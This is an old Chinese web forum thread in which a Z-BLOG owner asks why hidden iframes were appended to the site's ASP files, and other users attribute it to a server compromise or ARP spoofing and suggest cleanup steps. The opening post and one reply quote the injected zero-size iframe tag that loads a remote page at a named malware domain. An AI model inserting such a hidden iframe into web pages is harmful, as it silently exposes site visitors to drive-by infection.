ysdl 2007-6-4 15:41
我的Z-BLOG中木马了
我今天发现我的电脑提示打开的网站有木马,我把default,admin等文件下载下来一看,后面都被加上下面代码!
是什么原因??希望大家指点一下!
End If
%><iframe src=http://www.18dmm.com/dm/kehu0723.htm width=0 height=0></iframe><iframe src=http://www.18dmm.com/dm/kehu0723.htm width=0 height=0></iframe>
J.wei 2007-6-4 20:39
服务器中毒了,我的动网论坛也经常这样,建议把服务器补丁全打上,好像是ANI漏洞的补丁,忘记了,网上查查很多的,空间原因:hug:
Zx.MYS 2007-6-4 20:45
备份数据库和重要文件(这些重要文件如果是.asp,.asa,.html,.jsp,.js,.xhtml,.shtml,.php,.cgi,.xml[b]等等[/b]后缀名(可以输出网页的文件)需要手动或用杀毒软件删掉病毒),然后服务器彻底地杀毒,最好是格一遍,然后再装Z-BLOG。
如果是虚拟主机,没这么麻烦,要求服务商杀毒并[b]赔偿损失[/b]:lol
当然……自己的电脑先查毒,也有可能是你传上去之前时候在你电脑上被感染的。
Google 2007-6-4 20:45
经典老问题。
非程序原因, 是服务器遭ARP欺骗,服务器下的站点全部挂马。
解决方法:
联系空间商,解决ARP欺骗问题,删除相关页面 iframe 代码,至此问题解决。
清楚了吗? 赶快去叼你空间商去。:lol
Google 2007-6-4 20:53
ARP欺骗 杀毒软件是查杀不到的,只有空间商提高网络安全意识,做好ARP欺骗防范才是正道。
如果你空间商连ARP欺骗都不知道是什么,叫他滚回南泥湾种田去吧。;P
Google 2007-6-4 20:54
:)
[url]http://www.baidu.com/s?wd=arp%c6%db%c6%ad+www%2e18dmm%2ecom&cl=3[/url]
Google 2007-6-7 20:26
[quote]原帖由 [i]Zx.MYS[/i] 于 2007-6-5 17:41 发表
[color=red]不一定是ARP欺骗啊。
挂马的方法超级多的。[/color] [/quote]
挂马方法当然多,但具体问题具体分析
你看[color=red]1楼[/color]的:
<iframe src=http://[color=red]www.18dmm.com[/color]/dm/kehu0723.htm width=0 height=0></iframe>
再打开[color=red]6楼[/color]的网址就知道了。
[url=http://www.baidu.com/s?wd=arp%c6%db%c6%ad+www%2e18dmm%2ecom&cl=3]http://www.baidu.com/s?wd=arp%c6%db%c6%ad+www%2e18dmm%2ecom&cl=3[/url]
:) 18dmm 就拿手ARP这一套。
Zx.MYS 2007-6-7 21:44
晕。专业的ARP啊。
[[i] 本帖最后由 Zx.MYS 于 2007-6-7 21:45 编辑 [/i]]
zoo 2007-8-3 02:32
他娘的,原来是服务器中招了啊
日,明天就去找他们算帐!
dianso 2007-8-3 13:21
被挂马了,把空间里的webshell删掉,然后看看是不是服务器被拿下了.
qhy2007 2007-9-13 13:46
关于这个问题大家看看这两:
挂马的人们,你们停手吧!:[url]http://www.ieeye.com/post/guama_stop.html[/url]
恐怖的s.gcuj.com,附处理办法”
[url]http://www.ieeye.com/post/gcuj.com.html[/url]
